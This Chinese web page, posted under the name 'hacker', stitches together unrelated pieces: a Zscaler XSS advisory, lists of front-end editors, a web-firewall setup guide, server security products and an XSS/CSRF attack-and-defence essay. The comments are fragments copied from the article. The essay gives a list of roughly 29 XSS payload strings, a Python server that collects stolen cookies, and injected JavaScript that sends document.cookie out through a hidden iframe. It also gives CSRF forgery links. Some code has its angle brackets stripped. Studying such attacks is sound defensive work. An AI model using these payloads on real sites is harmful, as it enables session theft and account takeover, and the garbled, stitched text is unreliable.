xss好用的软件-xss app

第三方分享代码
hacker 3年前 (2022-07-13) 软件技术 163 5

目录介绍:

zscaler security是什么软件?

Zscaler云管理软件中已修复的XSS漏洞,这个缺陷可能被攻击者利用,从而攻击云环境中的其它用户。Zscaler Cloud管理软件中存在严重跨站脚本(XSS)缺陷,可能会被黑客利用。

zscaler是什么

Zscaler是一家全球云安全公司,提供互联网安全、 web 安全、 下一代防火墙、 沙盒,SSL 检验、 防病毒、 漏洞管理及颗粒控制,业务在云计算、 移动和互联网领域均有涉及。

总部位于加州圣何塞市的Zscaler已为5000多家企业和机构的云应用提供安全保障。2015年,获得Google旗下Google Capital的2500万美元投资。

Zscaler云管理软件中的跨站攻击漏洞,一旦被攻击者利用,在用户访问管理界面的时候,其浏览器就会被注入恶意的HTML和javascript。之后,只要攻击者需要登录到这个网站,就可以接管其它用户的账户,并以该用户的身份实施攻击行为。

Zscaler强调,缺陷会暴露同一组织内的黑客用户,因为攻击者只能在他们访问Zscaler的管理门户时,才可以将代码注入网页。“Zscaler已经解决了在admin.zscaler [X] .net和mobile.zscaler [X] .net门户中的XSS漏洞。这个漏洞,允许通过身份验证的管理员用户将恶意内容注入某些管理UI页面,这可能会影响同一公司的其他管理员用户。“Zscaler安全建议 , “Zscaler感谢Alex Haynes报告问题,并与Zscaler合作,确保他们得到适当的补救。

跨站攻击是什么

跨站攻击,即Cross Site script Execution(通常简写为XSS) ,是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。

跨站攻击形式时常容易被忽视,但带来的危害却不小。

前端开发常用又好用的几个软件

正所谓“工欲善其事必先利其器”,一名合格的Web前端开发工程师自然会用到不少能使其工作高效的工具。下面,就给大家分享Web前端学习需要了解的十款HTML5开发工具。

1、Lungo

Lungo是一款基于HTML5的开发框架,专为想要设计、构建和共享跨设备应用的开发者而准备。支持开放的Web标准,如HTML5、CSS3和JavaScript;支持手机、电视以及桌面设备。拥有强大的JavaScript API:开发WebAPP应用有很多种方式,而不是一味的优化。Lungo提供了一个强大的API,这样你可以完全掌控自己的WebAPP应用程序。

2、Animatron

Animatron是一款简单而又强大的在线工具,通过它,你可以创建出令人惊叹的的HTML5动画和互动内容。使用非常直观的Animatron编辑器去设计和发布完美的移动产品,同时也可以到处播放的电影和信息图表等,从桌面浏览器到移动设备,无需编码,所见即所得。

3、DCloudHBuilder

DCloudHBuilder:基于HTML5开发工具是当前最快的HTML开发工具,强大的代码助手帮你快速完成开发,最全的语法库和浏览器兼容性数据让浏览器碎片化不再头痛,DCloud 还提供云端打包服务,可以让开发者直接在云端生成 .ipa 或 .apk 安装包供部署调试。

4、mobl

mobl 是一个新的开源的编程语言,主要用于加速手机应用的开发,mobl 可方便构建手机 Web 应用程序,包括 iOS、Android 和其他支持 HTML5 技术的手机。Mobl使用一种与JavaScript非常类似的脚本语言实现了静态类型的推断语言。该语言拥有以下顶级结构: 实体(entities)、类型(types)、函数(functions)、控件(controls)、屏幕(screens)、样式(styles )和设备(services)。实体是在本地存储中持久化的数据元素,而类型是一种供我们使用的不稳定的数据。函数与那些定义在JavaScript以及能够调用JavaScript代码的语言中的函数类似等。

5、Initializr

Initializr 是制作 HTML5 网站最好的入门辅助开发工具,你可以使用提供的特色模板快速生成网站,也可以自定义,Initializr 会为你生成代码简洁的可定制的网页模板。

6、WebStorm

WebStorm是一款强大的HTML5/JavaScriptWeb前端开发工具,被广大JS开发者誉为“Web前端开发神器”。

WebStorm 8全新特性中包括对AngularJS的支持,能够高效准确地智能感知Angular语法、指令。WebStorm还完美支持Spy-js,合并了这款JavaScript调试利器,大大提高了开发者们的工作效率。

7、Notepad++

Notepad++程序员必备的文本编辑器,软件小巧高效,支持27种编程语言,通吃C,C++ ,Java ,C#, XML, HTML, PHP,JS 等,推荐各位下载使用。Notepad++ 可完美地取代微软的记事本。

8、Dreamweaver

Dreamweaver 是世界顶级软件厂商Adobe推出的一套拥有可视化编辑界面,用于制作并编辑网站和移动应用程序的网页设计软件。由于它支持代码、拆分、设计、实时视图等多种方式来创作、编写和修改网页,对于初级人员,你可以无需编写任何代码就能快速创建Web页面。其成熟的代码编辑工具更适用于Web开发高级人员的创作!

9、Eclipse

Eclipse的本身只是一个框架平台,但是众多插件的支持使得Eclipse拥有其他功能相对固定的IDE软件很难具有的灵活性。许多软件开发商以Eclipse为框架开发自己的IDE。Eclipse最初是由IBM公司开发的替代商业软件Visual Age for Java的下一代ide开发环境,2001年11月贡献给开源社区,现在它由非营利软件供应商联盟Eclipse基金会(Eclipse Foundation)管理。

10、DevExtreme

DevExtreme是专为你的移动世界精心准备的,一个跨平台开发的HTML5/JS框架,可以构建iOS、Android、Tizen和Windows Phone 8应用程序,是Visual Studio开发人员开发跨平台移动产品的优选工具。

以上就是为大家分享的十款HTML5开发必备的工具,相信这些工具一定会让你帮你在从事Web前端开发过程中提高效率,打开一扇新的大门。

web前端开发常用又好用的几个软件

web前端开发常用又好用的几个软件有:

1.Dreamweaver

Dreamweaver是非常老的前端开发工具了,功能强大还支持可视化开发,不需要懂代码就能制作出简单的前端页面,深受很多开发者的欢迎。但其缺点就是消耗的资源过大,软件启动和运行都会导致电脑运行变慢。

2.sublime text

sublime text是一款超级轻量级的开发工具,轻量级就代表它运行速度打开速度都超级快,并且还支持配置插件来构建不同的开发环境,还为开发者配置了很多的快捷键,使用习惯之后你就会离不开它。

3.Hbuilde

Hbuilder是近几年才开始火起来的前端开发工具,开发界面十分简洁,显示风格也很适宜,会让开发者有一种很舒服的感觉,同样也是轻量级的开发工具打开和运行速度都非常快。

4.Editplus

Editplus是一款超级好用的编辑器,它不仅仅支持前端语言开发,C语言、Java语言等等语言都可以使用Editplus开发,并且软件本身只有几M左右,十分小巧。缺点就是没有编程的提示功能,对初学者不是很友好。

想要了解更多有关web前端的相关信息,推荐咨询千锋教育。千锋教育成立教研学科中心,推出贴近企业需求的线下技能培训课程。采用全程面授高品质、高体验培养模式,学科大纲紧跟企业需求,拥有国内一体化教学管理及学员服务,在职业教育发展道路上不断探索前行。

哪有放XSS跨站脚本工具的第三方工具/

不修改网站程序,使用第三方工具来防范XSS跨站式脚本攻击

网站要怎么防范常见的XSS跨站式脚本攻击呢,我们先从XSS跨站式脚本攻击的原理来说起。

网站遭受XSS跨站式脚本攻击的基本原理

1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。

其攻击过程如下所示:

A给B发送一个恶意构造了Web的URL。

B点击并查看了这个URL。

恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。

具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。

A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。

2反射式漏洞,这种漏洞和本地利用漏洞有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。

其攻击过程如下:

A经常浏览某个网站,此网站为B所拥有。B的站点运行A使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)。

C发现B的站点包含反射性的XSS漏洞。

C编写一个利用漏洞的URL,并将其冒充为来自B的邮件发送给A。

A在登录到B的站点后,浏览C提供的URL。

嵌入到URL中的恶意脚本在A的浏览器中执行,就像它直接来自B的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在A完全不知情的情况下将这些信息发送到C的Web站点。

3存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。

其攻击过程如下:

B拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。

C注意到B的站点具有存储式的XXS漏洞。

C发布一个热点信息,吸引其它用户纷纷阅读。

B或者是任何的其他人如A浏览该信息,其会话cookies或者其它信息将被C盗走。

类型A直接威胁用户个体,而类型B和存储式漏洞所威胁的对象都是企业级Web应用。

网站遭受XSS跨站式脚本攻击的基本方式

1. DOM-based cross-site scripting

页面本身包含一些DOM对象的操作,如果未对输入的参数进行处理,可能会导致执行恶意脚本。如下面一些DOM操作:

document.URL

document.URLUnencoded

document.location (and many of its properties)

document.referrer

window.location (and many of its properties)

举个例子,假如某个脆弱的页面的代码如下:

HTML

TITLEWelcome!/TITLE

Hi

SCRIPT

var pos=document.URL.indexOf("name=")+5;

document.write(document.URL.substring(pos,document.URL.length));

/SCRIPT

BR

Welcome to our system

/HTML

攻击者使用如下的URL访问时,则非常危险:

;scriptalert(document.cookie)/script

试了一下,貌似IE、FireFox等浏览器默认 对scriptalert(document.cookie)/script进行了编码,阻止了脚本的执行。但是对于 DOM操作还是要更加谨慎啊,比如把上面的页面修改一下,安全性就增强了不少:

SCRIPT

var pos=document.URL.indexOf("name=")+5;

var name=document.URL.substring(pos,document.URL.length);

if (name.match(/^[a-zA-Z0-9]$/))

{

document.write(name);

}

else

{

window.alert("Security error");

}

/SCRIPT

2. Reflected cross-site scripting

也被称为None-Persistent cross-site scripting,即,非持久化的XSS攻击,是我们通常所说的,也是最常用,使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL,当 URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接菜能引起。

3. Persistent cross-site scripting

持久化XSS攻击,指的是恶意脚本代码被存储进被攻击的数据库,当其他用户正常浏览网页时,站点从数据库中读取了非法用户存入非法数据,恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。

实施方式

我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX,发现参数XXX原样的出现在了页面源码中:

1. input type="text" class="640e-e309-7a59-c601 Seach" name="w" value="XXX" /

OK,可以开始做文章了,我们将XXX替换为:abc"/scriptalert('haha')/scripta href=",返回的HTML代码如下:

1. input type="text" class="e309-7a59-c601-55c8 Seach" name="w" value="abc"/

2. scriptalert('haha')/script!--" /

这样,scriptalert('haha')/script被执行了。这里再举例一些XSS攻击行为:

1. IMG SRC="javascript:alert('XSS');"

2. IMG SRC=javascript:alert('XSS')

3. IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"

4. IMG SRC="jav ascript:alert('XSS');"

5. SCRIPT/XSS SRC=""/SCRIPT

6. SCRIPTalert("XSS");///SCRIPT

7. iframe src=

8. INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"

9. BODY BACKGROUND="javascript:alert('XSS')"

10. BODY ONLOAD=alert(document.cookie)

11. BODY onload!#$%()*~+-_.,:;?@[/|"]^`=alert("XSS")

12. IMG DYNSRC="javascript:alert('XSS')"

13. IMG DYNSRC="javascript:alert('XSS')"

14. BR SIZE="{alert('XSS')}"

15. IMG SRC='vbscript:msgbox("XSS")'

16. TABLE BACKGROUND="javascript:alert('XSS')"

17. DIV STYLE="width: expression(alert('XSS'));"

18. DIV STYLE="background-image: url(javascript:alert('XSS'))"

19. STYLE TYPE="text/javascript"alert('XSS');/STYLE

20. STYLE type="text/css"BODY{background:url("javascript:alert('XSS')")}/STYLE

21. ?='SCRIPTalert("XSS")/SCRIPT'?

22. A HREF="javascript:document.location=''"XSS/A

23. IMG SRC=javascript:alert('XSS')

24. EMBED SRC="" AllowScriptAccess="always"/EMBED

25. a="get";

26. b="URL(""";

27. c="javascript:";

28. d="alert('XSS');"")";

29. eval(a+b+c+d);

总结一下,要防止XSS跨站式脚本攻击主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些javascript关键字和一些敏感的字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用encode编码。

用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。

准备工作:先去下载最新的IISUTM版本。

根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来,这里需要注意的是使用Windows 2003+iis6的服务器,需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。

安装完成,通过浏览器访问IISUTM的配置管理界面默认的是,这个是私有地址,只能在该服务器上访问,你需要任何地方都能访问的话,可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址,和你所开放的端口。这样你就可以通过你配置的地址进行访问,或者你可以在iis中直接管理名为IISUTM的站点。

登陆管理界面后点击上面导航栏中的“基本设置”,然后点击左边菜单的“防XSS攻击”链接。

开启该链接里所有的选项,选中之后IISUTM会自动保存配置,下面的“使用不允许的发送序列”是该软件提供的XSS攻击关键字的特征库,你可以根据你网站的情况进行更改(最好不要修改)。

确认以上的配置以后,你可以返回到IISUTM管理界面的首页,这里会列出最近服务器遭受到的攻击以及详细,赶紧去看看你的网站是不是随时有人在进行SQL注入吧,以及哪些攻击被IISUTM处理掉了。

服务器安全软件除了云锁,安全狗,还有哪些

一般我们通常用的就只有下面这些,其他的建议慎重,以下这些比较权威,官方:

安全狗、

这款就是服务器上用的最多的软件,目前安全狗产品包括了服务器安全狗、网站安全狗及安全狗云中心等,而且所有的产品都是永久免费的,是国内首款支持Windows全系列服务器操作系统(Windows2003/Windows2008 32位 64位)和Linux系统的基于内核级的服务器安全防护软件。

主要功能有:

一是面向网站安全的:网马扫描及查杀(自有引擎,只针对网页木马);网马主动防御功能(可主动拦截网马上传和访问的动作);防SQL注入功能、防XSS跨站攻击功能;防盗链防下载;以及防止CC攻击。

二是面向服务器安全的:基于内核驱动的抗DDOS攻击、抗ARP攻击、抗WEBCC攻击功能;

三则是基于云端的监控和保护:利用云计算技术,构造一个较为全面的服务器和网站的监控和防护平台, 24小时的服务器健康监控、资源监控和资源告警、服务器可用性监控、基于云端技术的网站防篡改功能,保障网站文件不被非法修改。

护卫神

护卫神的产品是大部分免费的,作为国内最大的服务器软件供应商,此款软件在国内服务器市场也是非常热门产品。其中包含了20多款完全免费的服务器应用软件。入侵防护系统就是从黑客入侵的每个环节进行拦截,从而提升服务器安全的软件。网站安全系统是一款以分离权限为基础,通过一系列独特技术手段,保障网站不被入侵的安全防护软件。主机管理系统是一款通过网页开设空间、SQL的管理系统,告别手工开设站点的烦恼。好备份系统是一款自动备份SQL数据库和网站的免费软件,只需设置好备份任务,软件就会自动帮您完成备份工作.....产品众多,各位用户可以进入护卫神官网一一了解。

卡巴斯基服务器企业版

是俄罗斯著名的信息安全领导厂商“卡巴斯基实验室”所研发的,是世界上拥有最尖端科技的杀毒软件之一,同时它也有服务器版。它的主要功能包括有:与最新版本的 Kaspersky Security Center 兼容。可以远程安装和配置应用程序、管理操作和接收更新、通过 Microsoft Management Console,卡巴斯基网络安全管理中心或使用命令行来直接或远程管理 IT 安全。

但其实还有一些软件是商家基于自家服务器开发的安全软件系统,这种系统更能匹配和兼容服务器,我用的是《小鸟云》的服务器,有自带的云管家和云监控!还不错!

前端安全方面有没有了解?xss和csrf如何攻防

在那个年代,大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用,于是 SQL 注入成了很流行的攻击方式。在这个年代, 参数化查询 已经成了普遍用法,我们已经离 SQL 注入很远了。但是,历史同样悠久的 XSS 和 CSRF 却没有远离我们。由于之前已经对 XSS 很熟悉了,所以我对用户输入的数据一直非常小心。如果输入的时候没有经过 Tidy 之类的过滤,我一定会在模板输出时候全部转义。所以个人感觉,要避免 XSS 也是很容易的,重点是要“小心”。但最近又听说了另一种跨站攻击 CSRF ,于是找了些资料了解了一下,并与 XSS 放在一起做个比较。

XSS:脚本中的不速之客

XSS 全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论,提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本,作为内容发布到了页面上,其他用户访问这个页面的时候就会运行这些脚本。

运行预期之外的脚本带来的后果有很多中,可能只是简单的恶作剧——一个关不掉的窗口:

1

2

3

while (true) {

alert("你关不掉我~");

}

也可以是盗号或者其他未授权的操作——我们来模拟一下这个过程,先建立一个用来收集信息的服务器:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

#!/usr/bin/env python

#-*- coding:utf-8 -*-

"""

跨站脚本注入的信息收集服务器

"""

import bottle

app = bottle.Bottle()

plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')

app.install(plugin)

@app.route('/myxss/')

def show(cookies, db):

SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'

try:

db.execute(SQL, cookies)

except:

pass

return ""

if __name__ == "__main__":

app.run()

然后在某一个页面的评论中注入这段代码:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

// 用 script type="text/javascript"/script 包起来放在评论中

(function(window, document) {

// 构造泄露信息用的 URL

var cookies = document.cookie;

var xssURIBase = "";

var xssURI = xssURIBase + window.encodeURI(cookies);

// 建立隐藏 iframe 用于通讯

var hideFrame = document.createElement("iframe");

hideFrame.height = 0;

hideFrame.width = 0;

hideFrame.style.display = "none";

hideFrame.src = xssURI;

// 开工

document.body.appendChild(hideFrame);

})(window, document);

于是每个访问到含有该评论的页面的用户都会遇到麻烦——他们不知道背后正悄悄的发起了一个请求,是他们所看不到的。而这个请求,会把包含了他们的帐号和其他隐私的信息发送到收集服务器上。

我们知道 AJAX 技术所使用的 XMLHttpRequest 对象都被浏览器做了限制,只能访问当前域名下的 URL,所谓不能“跨域”问题。这种做法的初衷也是防范 XSS,多多少少都起了一些作用,但不是总是有用,正如上面的注入代码,用 iframe 也一样可以达到相同的目的。甚至在愿意的情况下,我还能用 iframe 发起 POST 请求。当然,现在一些浏览器能够很智能地分析出部分 XSS 并予以拦截,例如新版的 Firefox、Chrome 都能这么做。但拦截不总是能成功,何况这个世界上还有大量根本不知道什么是浏览器的用户在用着可怕的 IE6。从原则上将,我们也不应该把事关安全性的责任推脱给浏览器,所以防止 XSS 的根本之道还是过滤用户输入。用户输入总是不可信任的,这点对于 Web 开发者应该是常识。

正如上文所说,如果我们不需要用户输入 HTML 而只想让他们输入纯文本,那么把所有用户输入进行 HTML 转义输出是个不错的做法。似乎很多 Web 开发框架、模版引擎的开发者也发现了这一点,Django 内置模版和 Jinja2 模版总是默认转义输出变量的。如果没有使用它们,我们自己也可以这么做。PHP 可以用 htmlspecialchars 函数,Python 可以导入 cgi 模块用其中的 cgi.escape 函数。如果使用了某款模版引擎,那么其必自带了方便快捷的转义方式。

真正麻烦的是,在一些场合我们要允许用户输入 HTML,又要过滤其中的脚本。Tidy 等 HTML 清理库可以帮忙,但前提是我们小心地使用。仅仅粗暴地去掉 script 标签是没有用的,任何一个合法 HTML 标签都可以添加 onclick 一类的事件属性来执行 JavaScript。对于复杂的情况,我个人更倾向于使用简单的方法处理,简单的方法就是白名单重新整理。用户输入的 HTML 可能拥有很复杂的结构,但我们并不将这些数据直接存入数据库,而是使用 HTML 解析库遍历节点,获取其中数据(之所以不使用 XML 解析库是因为 HTML 要求有较强的容错性)。然后根据用户原有的标签属性,重新构建 HTML 元素树。构建的过程中,所有的标签、属性都只从白名单中拿取。这样可以确保万无一失——如果用户的某种复杂输入不能为解析器所识别(前面说了 HTML 不同于 XML,要求有很强的容错性),那么它不会成为漏网之鱼,因为白名单重新整理的策略会直接丢弃掉这些未能识别的部分。最后获得的新 HTML 元素树,我们可以拍胸脯保证——所有的标签、属性都来自白名单,一定不会遗漏。

现在看来,大多数 Web 开发者都了解 XSS 并知道如何防范,往往大型的 XSS 攻击(包括前段时间新浪微博的 XSS 注入)都是由于疏漏。我个人建议在使用模版引擎的 Web 项目中,开启(或不要关闭)类似 Django Template、Jinja2 中“默认转义”(Auto Escape)的功能。在不需要转义的场合,我们可以用类似 的方式取消转义。这种白名单式的做法,有助于降低我们由于疏漏留下 XSS 漏洞的风险。

另外一个风险集中区域,是富 AJAX 类应用(例如豆瓣网的阿尔法城)。这类应用的风险并不集中在 HTTP 的静态响应内容,所以不是开启模版自动转义能就能一劳永逸的。再加上这类应用往往需要跨域,开发者不得不自己打开危险的大门。这种情况下,站点的安全非常 依赖开发者的细心和应用上线前有效的测试。现在亦有不少开源的 XSS 漏洞测试软件包(似乎有篇文章提到豆瓣网的开发也使用自动化 XSS 测试),但我都没试用过,故不予评价。不管怎么说,我认为从用户输入的地方把好关总是成本最低而又最有效的做法。

CSRF:冒充用户之手

起初我一直弄不清楚 CSRF 究竟和 XSS 有什么区别,后来才明白 CSRF 和 XSS 根本是两个不同维度上的分类。XSS 是实现 CSRF 的诸多途径中的一条,但绝对不是唯一的一条。一般习惯上把通过 XSS 来实现的 CSRF 称为 XSRF。

CSRF 的全称是“跨站请求伪造”,而 XSS 的全称是“跨站脚本”。看起来有点相似,它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户,但前面说了,它们的攻击类型是不同维度上的分 类。CSRF 顾名思义,是伪造请求,冒充用户在站内的正常操作。我们知道,绝大多数网站是通过 cookie 等方式辨识用户身份(包括使用服务器端 Session 的网站,因为 Session ID 也是大多保存在 cookie 里面的),再予以授权的。所以要伪造用户的正常操作,最好的方法是通过 XSS 或链接欺骗等途径,让用户在本机(即拥有身份 cookie 的浏览器端)发起用户所不知道的请求。

严格意义上来说,CSRF 不能分类为注入攻击,因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌,但对于设计不佳的网站,一条正常的链接都能造成 CSRF。

例如,一论坛网站的发贴是通过 GET 请求访问,点击发贴之后 JS 把发贴内容拼接成目标 URL 并访问:

标题content=内容

那么,我只需要在论坛中发一帖,包含一链接:

我是脑残content=哈哈

只要有用户点击了这个链接,那么他们的帐户就会在不知情的情况下发布了这一帖子。可能这只是个恶作剧,但是既然发贴的请求可以伪造,那么删帖、转帐、改密码、发邮件全都可以伪造。

如何解决这个问题,我们是否可以效仿上文应对 XSS 的做法呢?过滤用户输入, 不允许发布这种含有站内操作 URL 的链接。这么做可能会有点用,但阻挡不了 CSRF,因为攻击者可以通过 QQ 或其他网站把这个链接发布上去,为了伪装可能还使用 bit.ly 压缩一下网址,这样点击到这个链接的用户还是一样会中招。所以对待 CSRF ,我们的视角需要和对待 XSS 有所区别。CSRF 并不一定要有站内的输入,因为它并不属于注入攻击,而是请求伪造。被伪造的请求可以是任何来源,而非一定是站内。所以我们唯有一条路可行,就是过滤请求的 处理者。

比较头痛的是,因为请求可以从任何一方发起,而发起请求的方式多种多样,可以通过 iframe、ajax(这个不能跨域,得先 XSS)、Flash 内部发起请求(总是个大隐患)。由于几乎没有彻底杜绝 CSRF 的方式,我们一般的做法,是以各种方式提高攻击的门槛。

首先可以提高的一个门槛,就是改良站内 API 的设计。对于发布帖子这一类创建资源的操作,应该只接受 POST 请求,而 GET 请求应该只浏览而不改变服务器端资源。当然,最理想的做法是使用 REST 风格 的 API 设计,GET、POST、PUT、DELETE 四种请求方法对应资源的读取、创建、修改、删除。现在的浏览器基本不支持在表单中使用 PUT 和 DELETE 请求方法,我们可以使用 ajax 提交请求(例如通过 jquery-form 插件,我最喜欢的做法),也可以使用隐藏域指定请求方法,然后用 POST 模拟 PUT 和 DELETE (Ruby on Rails 的做法)。这么一来,不同的资源操作区分的非常清楚,我们把问题域缩小到了非 GET 类型的请求上——攻击者已经不可能通过发布链接来伪造请求了,但他们仍可以发布表单,或者在其他站点上使用我们肉眼不可见的表单,在后台用 js 操作,伪造请求。

接下来我们就可以用比较简单也比较有效的方法来防御 CSRF,这个方法就是“请求令牌”。读过《J2EE 核心模式》的同学应该对“同步令牌”应该不会陌生,“请求令牌”和“同步令牌”原理是一样的,只不过目的不同,后者是为了解决 POST 请求重复提交问题,前者是为了保证收到的请求一定来自预期的页面。实现方法非常简单,首先服务器端要以某种策略生成随机字符串,作为令牌(token), 保存在 Session 里。然后在发出请求的页面,把该令牌以隐藏域一类的形式,与其他信息一并发出。在接收请求的页面,把接收到的信息中的令牌与 Session 中的令牌比较,只有一致的时候才处理请求,否则返回 HTTP 403 拒绝请求或者要求用户重新登陆验证身份。

请求令牌虽然使用起来简单,但并非不可破解,使用不当会增加安全隐患。使用请求令牌来防止 CSRF 有以下几点要注意:

虽然请求令牌原理和验证码有相似之处,但不应该像验证码一样,全局使用一个 Session Key。因为请求令牌的方法在理论上是可破解的,破解方式是解析来源页面的文本,获取令牌内容。如果全局使用一个 Session Key,那么危险系数会上升。原则上来说,每个页面的请求令牌都应该放在独立的 Session Key 中。我们在设计服务器端的时候,可以稍加封装,编写一个令牌工具包,将页面的标识作为 Session 中保存令牌的键。

在 ajax 技术应用较多的场合,因为很有请求是 JavaScript 发起的,使用静态的模版输出令牌值或多或少有些不方便。但无论如何,请不要提供直接获取令牌值的 API。这么做无疑是锁上了大门,却又把钥匙放在门口,让我们的请求令牌退化为同步令牌。

第一点说了请求令牌理论上是可破解的,所以非常重要的场合,应该考虑使用验证码(令牌的一种升级,目前来看破解难度极大),或者要求用户再次输入密码(亚马逊、淘宝的做法)。但这两种方式用户体验都不好,所以需要产品开发者权衡。

无论是普通的请求令牌还是验证码,服务器端验证过一定记得销毁。忘记销毁用过的令牌是个很低级但是杀伤力很大的错误。我们学校的选课系统就有这个 问题,验证码用完并未销毁,故只要获取一次验证码图片,其中的验证码可以在多次请求中使用(只要不再次刷新验证码图片),一直用到 Session 超时。这也是为何选课系统加了验证码,外挂软件升级一次之后仍然畅通无阻。

如下也列出一些据说能有效防范 CSRF,其实效果甚微的方式甚至无效的做法。

通过 referer 判定来源页面:referer 是在 HTTP Request Head 里面的,也就是由请求的发送者决定的。如果我喜欢,可以给 referer 任何值。当然这个做法并不是毫无作用,起码可以防小白。但我觉得性价比不如令牌。

过滤所有用户发布的链接:这个是最无效的做法,因为首先攻击者不一定要从站内发起请求(上面提到过了),而且就算从站内发起请求,途径也远远不知链接一条。比如 img src="./create_post.php" / 就是个不错的选择,还不需要用户去点击,只要用户的浏览器会自动加载图片,就会自动发起请求。 *在请求发起页面用 alert 弹窗提醒用户:这个方法看上去能干扰站外通过 iframe 发起的 CSRF,但攻击者也可以考虑用 window.alert = function(){}; 把 alert 弄哑,或者干脆脱离 iframe,使用 Flash 来达到目的。

总体来说,目前防御 CSRF 的诸多方法还没几个能彻底无解的。所以 CSDN 上看到讨论 CSRF 的文章,一般都会含有“无耻”二字来形容(另一位有该名号的貌似是 DDOS 攻击)。作为开发者,我们能做的就是尽量提高破解难度。当破解难度达到一定程度,网站就逼近于绝对安全的位置了(虽然不能到达)。上述请求令牌方法,就我 认为是最有可扩展性的,因为其原理和 CSRF 原理是相克的。CSRF 难以防御之处就在于对服务器端来说,伪造的请求和正常的请求本质上是一致的。而请求令牌的方法,则是揪出这种请求上的唯一区别——来源页面不同。我们还可 以做进一步的工作,例如让页面中 token 的 key 动态化,进一步提高攻击者的门槛。本文只是我个人认识的一个总结,便不讨论过深了。

相关推荐

网友评论

  • (*)

最新评论

  • 访客 2022-07-13 10:15:18 回复

    问到含有该评论的页面的用户都会遇到麻烦——他们不知道背后正悄悄的发起了一个请求,是他们所看不到的。而这个请求,会把包含了他们的帐号和其他隐私的信息发送到收集服务器上。我们知道 AJAX 技术所使用的 XMLHttpRequest 对象都被浏览器做了限制,只能访问当前域名下的 URL,所谓不能“跨域”

    1
  • 访客 2022-07-13 05:28:24 回复

    RC="javascript:alert(String.fromCharCode(88,83,83))" 4. IMG SRC="jav ascript:alert('XSS');" 5. SCRIPT/XSS SRC

    2
  • 访客 2022-07-13 06:00:26 回复

    中 token 的 key 动态化,进一步提高攻击者的门槛。本文只是我个人认识的一个总结,便不讨论过深了。

    3
  • 访客 2022-07-13 06:44:34 回复

    强大的JavaScript API:开发WebAPP应用有很多种方式,而不是一味的优化。Lungo提供了一个强大的API,这样你可以完全掌控自己的WebAPP应用程序。2、AnimatronAnimatron是一款简

    4
  • 访客 2022-07-13 09:51:20 回复

    掉的窗口:123 while (true) { alert("你关不掉我~");}也可以是盗号或者其他未授权的操作——我们来模拟一下这个过程,先建立一个用来收集信息的服务器:123456789101112131415161718192021222324 #!/usr/bin/env

    5